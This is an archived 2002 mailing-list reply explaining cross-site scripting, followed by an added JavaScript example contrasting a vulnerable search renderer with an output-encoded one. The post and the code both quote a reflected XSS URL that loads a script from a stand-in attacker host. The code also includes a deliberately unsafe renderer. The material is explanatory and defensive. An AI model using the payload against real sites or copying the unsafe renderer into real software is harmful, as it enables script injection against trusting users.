Pantek Library

Re: XSS

From: Stephen de Vries <dv8(at)omega.arcbox.com>
Date: Wed Dec 11 2002 - 06:00:02 EST

The real problem with XSS is that an attacker abuses the trust that a legitimate client has in your domain. An attacker can execute ANY JavaScript (or HTML) under the guise of the trusted domain, if a script in that domain is vulnerable to XSS. For example, an attacker can use JavaScript to rewrite an entire HTML page, providing false information under the guise of www.trusteddomain.com/search?<script src="www.attacker.com/myscript.js"></script> thereby subverting the trust that clients put in your domain.

Stephen.

On Tue, 10 Dec 2002, John Madden wrote:

> Hi All,
Received on Wed Dec 11 10:16:42 2002
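
The reflection described in the message above, shown from the defender's side as an added example that is not part of the original post: a search page that echoes its query as markup, next to the same page with output encoding. The renderer, the helper names and the page template are assumptions; the sample URL is the one quoted in the message.

```javascript
'use strict';

// Characters that let untrusted text leave an HTML text or attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text so the browser shows it as characters, not markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical vulnerable renderer: the query is concatenated in as markup,
// so a script element in it runs with the origin of the trusted domain.
function renderSearchUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened renderer: same template, but the query is encoded on output.
function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Everything after '?' is treated as the search term, as in the message's URL.
// Malformed percent-encoding is kept raw rather than crashing the handler.
function queryFromUrl(url) {
  const i = url.indexOf('?');
  if (i === -1) return '';
  const raw = url.slice(i + 1);
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return raw;
  }
}

// Simple check for tests and log review: does the output carry a live script tag?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// URL form quoted in the message above.
const SAMPLE_URL =
  'http://www.trusteddomain.com/search?<script src="www.attacker.com/myscript.js"></script>';

const sampleQuery = queryFromUrl(SAMPLE_URL);
console.log('unsafe:', renderSearchUnsafe(sampleQuery));
console.log('safe:  ', renderSearchSafe(sampleQuery));
```

Encoding on output is the fix at the point of reflection; the same `containsScriptElement` check can run in a regression test over every page that echoes request data.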

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:46 EDT

